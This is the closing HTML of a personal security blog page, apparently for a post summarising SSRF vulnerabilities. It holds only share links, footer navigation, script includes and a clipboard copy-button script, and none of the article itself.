  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/&is_video=false&description=ssrf漏洞总结-起"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=ssrf漏洞总结-起&body=Check out this article: https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/&title=ssrf漏洞总结-起"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/&title=ssrf漏洞总结-起"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/&title=ssrf漏洞总结-起"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/&title=ssrf漏洞总结-起"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/&name=ssrf漏洞总结-起&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/&t=ssrf漏洞总结-起"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2022
    vulnner
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">archives</a></li>
         
          <li><a href="/projects_url">Projects</a></li>
         
          <li><a href="/tags/">tags</a></li>
         
          <li><a href="/categories">categories</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
